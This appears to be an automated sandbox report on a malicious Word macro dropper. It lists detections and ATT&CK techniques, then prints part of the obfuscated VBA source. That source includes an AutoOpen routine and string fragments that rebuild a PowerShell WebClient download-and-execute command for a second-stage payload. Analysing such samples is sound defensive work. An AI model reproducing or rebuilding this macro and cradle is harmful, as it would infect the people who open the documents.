Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro constructs a URL using string concatenation and attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6446843-0' further supports the malicious nature of the file.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6446843-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6446843-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://bQTb+QTbeQTb+QoUz+oUzTbrQTb+ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32532 bytes |

SHA-256: 2ba31dd68b45d4713d0ec78a247bcb6c0b651c2c03cae1e29a80494de40cb11e

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qoADusjTtFpdk"
Sub AutoOpen()
On Error Resume Next
jPMRbMdKz = jnnsVtXuws - Sgn(AOGvH) - (7645120 - Tan(182224) / 4790621 - ChrW(iJS))
NEcDpuwzS = TQOGiCXitIJSi - Sgn(GWU) - (4796194 - Tan(5429981) / 7283521 - ChrW(CaVaotqhzAurI))
upjAFwBUl = IuV - Sgn(zSaZUjzRq) - (8538150 - Tan(6255245) / 8885620 - ChrW(jAtIP))
Application.Run "kOpQIqQC", fSiiOikNunmDho
aaGQqTTdj = QaNfSRtP - Sgn(aaLKczoU) - (2181057 - Tan(7937659) / 4104416 - ChrW(rrtTvVj))
cGFrwXAPi = bsn - Sgn(TipPPdQBzIo) - (2816989 - Tan(1208555) / 4810478 - ChrW(UMXvMnTUiOm))
cjJTjzhiY = EEfsQ - Sgn(GzCiRbjKo) - (872550 - Tan(9403956) / 5217555 - ChrW(ANGBdBhrjYrjXA))
End Sub
Function fSiiOikNunmDho()
On Error Resume Next
JnjJZzGKOZ = CEOUSSqZOnsKM - Sgn(MjXB) - (756874 - Tan(100542) / 615485 - ChrW(rwbFEjmGmmS))
TanMXf = SvMJk - Sgn(zMWomE) - (3702965 - Tan(2108868) / 7683984 - ChrW(ENhWqQ))
rzRfXqVB = PtNNKm - Sgn(AGrA) - (7447879 - Tan(3142264) / 4327133 - ChrW(RnBqQC))
owWTDDBMv = YpFVAbi + Mid(ipm + "jiuOn+uOn'+'+QTb6Y/?QTb+QoUz+oUzTbhtQTb+QTbtpsQTb+QoUz+oUzTb:/QTboUz+oUz+Q'+'Tb/s'+'porQTb+QTbtshuOn+uOnQTb+QTbub.ouQTb+Q'+'TbtcoQTb+QuOn+uOnTbmQTb+QTbe.liQTb+QTbfQTb+QTbe/QTb+QTbr3QTb+QTbADQTb+hYjCCUvMOVIlwlZwwzcFcpX" + bfPfQAwbOlW, 3, 192)
uktIqawX = DVaTR - Sgn(GbBvfk) - (6539084 - Tan(4871861) / 9444484 - ChrW(lMQCPfLTVUiLd))
hjujAIbPZo = cUCXu - Sgn(wiXKHLfRmopTt) - (406108 - Tan(1585185) / 1545274 - ChrW(zvXKGwzkuwq))
oLMbdSTqPiT = KhKfCzD - Sgn(FuDAuhhfLRbC) - (3880159 - Tan(6973945) / 1006256 - ChrW(WkpkaaMMo))
IHlMbiwhfwa = XmtsXCZE + Mid(VCizQXCoaNnjMS + "kdwwIYwAXCpqVzVItnz,[ChAR]124'+')9ry&'+'( C2LenV:pUbLiCHjqmzJQwlIUNnzfDLDYV" + XsqvtUAz, 19, 37)
NjYbTCr = MvFaAXaWzBFC - Sgn(AVQTIBjpAzB) - (5948641 - Tan(9280903) / 6105738 - ChrW(zlCAUBJTU))
ETXItM = RBCBqwVZzHwr - Sgn(HdwBMwDvDrAYLw) - (891954 - Tan(6582933) / 6478414 - ChrW(BvdqzjnJCfFw))
BMdrEuIwPM = dGmvWVAz - Sgn(QuNKCdfw) - (3261085 - Tan(8312827) / 3400481 - ChrW(vvVQdRN))
mnrRt = bGforFESfCsWPZ + Mid(RZdXow + "QbdlrrBZUYICTb+QTbhtQoU'+'z+oUzTb+QTbtQTb+QTbpQTb+QTbs:QTb+QTb/QTbzEphzdslPdCbz" + ciIRHSPii, 13, 54)
juALl = LQitDmudsEG - Sgn(fMGujikYRQno) - (7807005 - Tan(7515616) / 625150 - ChrW(oJbbNnFI))
UzLdkQCWw = oJuwzmiV - Sgn(zwXKfjuhRvdqEQ) - (6873144 - Tan(4165108) / 7871764 - ChrW(cfdrGwVuVqa))
MFHJBQ = dISpnEB - Sgn(ishfWKiijs) - (2005049 - Tan(5507829) / 2061513 - ChrW(BqV))
VFnIPsQZVT = tYqGTWR + Mid(DhMhsdfi + "A+oUz+QTb3q+r3QTb+QTbqQTb+QTb-objQTb+QTbeQTb+QTbctQTb+QTbrQTbuOn+uOn+QTb3QTb+QTbq) SystQTb+QTbem.QTb+QTbNetQ'+'Tb+QTb.uOn+uoUz+oUzO'+'nQTb+QTbWebClienuOn+uOnjrilUCiqz" + piKiEOOfG, 2, 156)
BlwEaOBQiov = TmKcfzHZHbUjM - Sgn(qtdcXXsKK) - (4107959 - Tan(3085597) / 6087441 - ChrW(AzRs))
btiGqIGQ = lwGBZlYK - Sgn(sNwtwRsTLGVZw) - (498920 - Tan(1787985) / 5409902 - ChrW(MApGaqizuQVo))
IpIqEi = rENfAwO - Sgn(UNPjoKXzn) - (8876318 - Tan(9395271) / 4909466 - ChrW(ZYUlSXNwBBX))
HfWJFJfbOm = sZokOEHz + Mid(UXOciUK + "sCbtBUKNCOYmrVA[cHAR]81+[cuOn+uOnHAR]65),[cHAR]36) 7hG& ( bSIeNv:'+'cOMspec[4,15,25]-jOinQTbQTboUz+oUz)uOn).repLoUz+oUzaCe(([cHar]81+['+'cHa'+'r]84+[rVPmOijRPujrXvjWwj" + kwzV, 16, 134)
jadqwjI = BiSLsBwu - Sgn(lUsk) - (2288026 - Tan(4248278) / 6266651 - ChrW(uMjqBwujwQH))
jkIBXEi = kTZTmMjZahXplE - Sgn(ldoDNm) - (8989700 - Tan(9662570) / 6428418 - ChrW(izi))
RILIHqIti = fulpwVSv - Sgn(zzmGKNoq) - (1073325 - Tan(9450290) / 6585352 - ChrW(CKMtK))
dkTQzMVVHRd = rPQMTCMNOsm + Mid(ZmjLzGVY + "YRjkXdAo&( $PSHomE[21]+$pshoMe[30]+'x') (('((oUz(uOn((QToUz+oUzbCQAnuOn+uO'+'nsaQToUz+oUzb+QTbd'+'asuXXhJbisRSj" + jSjtti, 9, 93)
usjPRMBQA = lEPaCrSOlSw - Sgn(ITiFkwG) - (5223339 - Tan(2163525) / 243537 - ChrW(RDNEwCwnwwR))
wwSUf = aUKrUKnNwjRP - Sgn(JaNEARakR) - (9482514 - Tan(4395911) / 7858270 - ChrW(TLnfwUriEkZ))
rfttD = mQXn - Sgn(lmzbpcljwjqE
... (truncated)